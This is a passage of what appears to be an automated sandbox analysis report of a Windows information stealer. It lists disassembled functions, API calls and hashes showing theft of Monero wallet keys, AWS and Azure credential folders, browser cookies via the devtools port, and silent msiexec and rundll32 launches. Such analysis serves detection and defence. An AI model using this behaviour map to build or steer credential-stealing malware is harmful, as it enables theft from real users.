                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                      • String ID: "$"$------$------$------
                                      • API String ID: 874700897-2180234286
                                      • Opcode ID: be2421ed5ae6272c0311b149ad218cf69eebedd824e896a170d22218daec40e3
                                      • Instruction ID: e8e8a5e6de832605196f6e230b0841f43edf19ac3d30e26b89b3855c161945aa
                                      • Opcode Fuzzy Hash: be2421ed5ae6272c0311b149ad218cf69eebedd824e896a170d22218daec40e3
                                      • Instruction Fuzzy Hash: CA123076960128ABDB14EBA0DDA5FEEB339FF64700F004599F10A62191EF302E49CF61
                                      Function 00A3CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A48CF0: GetSystemTime.KERNEL32(00A50E1B,0131E198,00A505B6,?,?,00A313F9,?,0000001A,00A50E1B,00000000,?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A48D16
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A3D083
                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00A3D1C7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A3D1CE
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D308
                                      • lstrcat.KERNEL32(?,00A51570), ref: 00A3D317
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D32A
                                      • lstrcat.KERNEL32(?,00A51574), ref: 00A3D339
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D34C
                                      • lstrcat.KERNEL32(?,00A51578), ref: 00A3D35B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D36E
                                      • lstrcat.KERNEL32(?,00A5157C), ref: 00A3D37D
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D390
                                      • lstrcat.KERNEL32(?,00A51580), ref: 00A3D39F
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D3B2
                                      • lstrcat.KERNEL32(?,00A51584), ref: 00A3D3C1
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A3D3D4
                                      • lstrcat.KERNEL32(?,00A51588), ref: 00A3D3E3
                                        • Part of subcall function 00A4AB30: lstrlen.KERNEL32(00A34F55,?,?,00A34F55,00A50DDF), ref: 00A4AB3B
                                        • Part of subcall function 00A4AB30: lstrcpy.KERNEL32(00A50DDF,00000000), ref: 00A4AB95
                                      • lstrlen.KERNEL32(?), ref: 00A3D42A
                                      • lstrlen.KERNEL32(?), ref: 00A3D439
                                        • Part of subcall function 00A4AD80: StrCmpCA.SHLWAPI(00000000,00A51568,00A3D2A2,00A51568,00000000), ref: 00A4AD9F
                                      • DeleteFileA.KERNEL32(00000000), ref: 00A3D4B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                      • String ID:
                                      • API String ID: 1956182324-0
                                      • Opcode ID: 119c905552fc026fd1b964d6e1c2fa396a8e2ce8cb806d1617083047d749167a
                                      • Instruction ID: 0858517d8c9d691b0bc9f4f5f5d07816c2cf65bccdc47fb4e44db9c57af6f48d
                                      • Opcode Fuzzy Hash: 119c905552fc026fd1b964d6e1c2fa396a8e2ce8cb806d1617083047d749167a
                                      • Instruction Fuzzy Hash: 3CE11F75D50208ABDB04EBA0DE96EEE7379BFA4301F104558F106A61A1DE31BE09CB75
                                      Function 00A3CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0131D530,00000000,?,00A51544,00000000,?,?), ref: 00A3CB6C
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00A3CB89
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 00A3CB95
                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A3CBA8
                                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00A3CBD9
                                      • StrStrA.SHLWAPI(?,0131D560,00A50B56), ref: 00A3CBF7
                                      • StrStrA.SHLWAPI(00000000,0131D590), ref: 00A3CC1E
                                      • StrStrA.SHLWAPI(?,0131DB20,00000000,?,00A51550,00000000,?,00000000,00000000,?,01318BB8,00000000,?,00A5154C,00000000,?), ref: 00A3CDA2
                                      • StrStrA.SHLWAPI(00000000,0131DA40), ref: 00A3CDB9
                                        • Part of subcall function 00A3C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00A3C971
                                        • Part of subcall function 00A3C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00A3C97C
                                      • StrStrA.SHLWAPI(?,0131DA40,00000000,?,00A51554,00000000,?,00000000,01318B48), ref: 00A3CE5A
                                      • StrStrA.SHLWAPI(00000000,01318A98), ref: 00A3CE71
                                        • Part of subcall function 00A3C920: lstrcat.KERNEL32(?,00A50B47), ref: 00A3CA43
                                        • Part of subcall function 00A3C920: lstrcat.KERNEL32(?,00A50B4B), ref: 00A3CA57
                                        • Part of subcall function 00A3C920: lstrcat.KERNEL32(?,00A50B4E), ref: 00A3CA78
                                      • lstrlen.KERNEL32(00000000), ref: 00A3CF44
                                      • CloseHandle.KERNEL32(00000000), ref: 00A3CF9C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                      • String ID:
                                      • API String ID: 3744635739-3916222277
                                      • Opcode ID: 5002025569fbcfde50ae40a43987ba7a53241ac4c4e6764c73b0138d69bb025e
                                      • Instruction ID: 1ee90bff1c502112d9d7a54a561d2c459883aa7c7a3549004ea12b90b2df28be
                                      • Opcode Fuzzy Hash: 5002025569fbcfde50ae40a43987ba7a53241ac4c4e6764c73b0138d69bb025e
                                      • Instruction Fuzzy Hash: 56E10076940118ABDB14EBA4DDA2FEEB779FFA4300F004559F106A7191EF306A49CB61
                                      Function 00A484B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • RegOpenKeyExA.ADVAPI32(00000000,0131B408,00000000,00020019,00000000,00A505BE), ref: 00A48534
                                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00A485B6
                                      • wsprintfA.USER32 ref: 00A485E9
                                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00A4860B
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A4861C
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00A48629
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                                      • String ID: - $%s\%s$?
                                      • API String ID: 3246050789-3278919252
                                      • Opcode ID: 2966ca39331f3d4b87fedc1e9122f723db12391d3e6d293d4a0e747cbc041ba3
                                      • Instruction ID: e1117bc35ef9bf1dd2fd2c9d7f86175d3a06af75389c0ee89141eb025811d625
                                      • Opcode Fuzzy Hash: 2966ca39331f3d4b87fedc1e9122f723db12391d3e6d293d4a0e747cbc041ba3
                                      • Instruction Fuzzy Hash: 7E812B75950218ABEB24DB54DD91FEAB7B8FF58300F1086D8E109A6180DF746F89CFA1
                                      Function 00A44FC0 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A48F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A45000
                                      • lstrcat.KERNEL32(?,\.azure\), ref: 00A4501D
                                        • Part of subcall function 00A44B60: wsprintfA.USER32 ref: 00A44B7C
                                        • Part of subcall function 00A44B60: FindFirstFileA.KERNEL32(?,?), ref: 00A44B93
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A4508C
                                      • lstrcat.KERNEL32(?,\.aws\), ref: 00A450A9
                                        • Part of subcall function 00A44B60: StrCmpCA.SHLWAPI(?,00A50FC4), ref: 00A44BC1
                                        • Part of subcall function 00A44B60: StrCmpCA.SHLWAPI(?,00A50FC8), ref: 00A44BD7
                                        • Part of subcall function 00A44B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00A44DCD
                                        • Part of subcall function 00A44B60: FindClose.KERNEL32(000000FF), ref: 00A44DE2
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A45118
                                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00A45135
                                        • Part of subcall function 00A44B60: wsprintfA.USER32 ref: 00A44C00
                                        • Part of subcall function 00A44B60: StrCmpCA.SHLWAPI(?,00A508D3), ref: 00A44C15
                                        • Part of subcall function 00A44B60: wsprintfA.USER32 ref: 00A44C32
                                        • Part of subcall function 00A44B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00A44C6E
                                        • Part of subcall function 00A44B60: lstrcat.KERNEL32(?,0131F450), ref: 00A44C9A
                                        • Part of subcall function 00A44B60: lstrcat.KERNEL32(?,00A50FE0), ref: 00A44CAC
                                        • Part of subcall function 00A44B60: lstrcat.KERNEL32(?,?), ref: 00A44CC0
                                        • Part of subcall function 00A44B60: lstrcat.KERNEL32(?,00A50FE4), ref: 00A44CD2
                                        • Part of subcall function 00A44B60: lstrcat.KERNEL32(?,?), ref: 00A44CE6
                                        • Part of subcall function 00A44B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00A44CFC
                                        • Part of subcall function 00A44B60: DeleteFileA.KERNEL32(?), ref: 00A44D81
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                      • API String ID: 949356159-974132213
                                      • Opcode ID: cbf8a6eb9dd98466908626e35f72bfc5cdbd48edfa5296a76478f84fb9c0764f
                                      • Instruction ID: c0e6ba835aba913a4c109cd84b8d9e3d8907040247ffd8899c6d034c2c73bdde
                                      • Opcode Fuzzy Hash: cbf8a6eb9dd98466908626e35f72bfc5cdbd48edfa5296a76478f84fb9c0764f
                                      • Instruction Fuzzy Hash: E041927A94020467DB50F770ED5BFED3328ABA4701F404854B649A60C1EEB56BCCCB92
                                      Function 00A491A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A491FC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateGlobalStream
                                      • String ID: image/jpeg
                                      • API String ID: 2244384528-3785015651
                                      • Opcode ID: f38e04283d6768a97413675a51faad426253d98f20af326d05d552ba6f6130f1
                                      • Instruction ID: 234e06f6e91a414ab114db0675239ebe4f6279c462f03bce804f3639df6229fa
                                      • Opcode Fuzzy Hash: f38e04283d6768a97413675a51faad426253d98f20af326d05d552ba6f6130f1
                                      • Instruction Fuzzy Hash: CA71AC75E14208ABDB14DFE4DD89FEEB778BB88700F108518F51AEB290DB75A904CB61
                                      Function 00A43080 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00A43415
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00A435AD
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00A4373A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell$lstrcpy
                                      • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                      • API String ID: 2507796910-3625054190
                                      • Opcode ID: ac0a51e5a9f98300f7031bd58875a6f193a291e45a60fa8da96836ebcb3196a8
                                      • Instruction ID: 23037924ea46b065fb14618fec2a71d3c713c678f71a26d30d8b079ad67de6a6
                                      • Opcode Fuzzy Hash: ac0a51e5a9f98300f7031bd58875a6f193a291e45a60fa8da96836ebcb3196a8
                                      • Instruction Fuzzy Hash: 1412107A9501189ADB04FBE0DEA2FEDB739AFA4300F004599F50666192EF346F49CF61
                                      Function 00A39BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A39A50: InternetOpenA.WININET(00A50AF6,00000001,00000000,00000000,00000000), ref: 00A39A6A
                                      • lstrcat.KERNEL32(?,cookies), ref: 00A39CAF
                                      • lstrcat.KERNEL32(?,00A512C4), ref: 00A39CC1
                                      • lstrcat.KERNEL32(?,?), ref: 00A39CD5
                                      • lstrcat.KERNEL32(?,00A512C8), ref: 00A39CE7
                                      • lstrcat.KERNEL32(?,?), ref: 00A39CFB
                                      • lstrcat.KERNEL32(?,.txt), ref: 00A39D0D
                                      • lstrlen.KERNEL32(00000000), ref: 00A39D17
                                      • lstrlen.KERNEL32(00000000), ref: 00A39D26
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                      • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                      • API String ID: 3174675846-3542011879
                                      • Opcode ID: d8a31f06d9ab14f99355cd097b29ab61460293fd914cb205d042508f81a9761d
                                      • Instruction ID: 430d839ee0ed02954945e212d992ce0c567b72784a74f3dd741b2321a1908d35
                                      • Opcode Fuzzy Hash: d8a31f06d9ab14f99355cd097b29ab61460293fd914cb205d042508f81a9761d
                                      • Instruction Fuzzy Hash: 8A514FB1D10608ABDB14EBE0DD96FEE7338BB54301F404558F60AAB191EF74AA49CF61
                                      Function 00A45510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
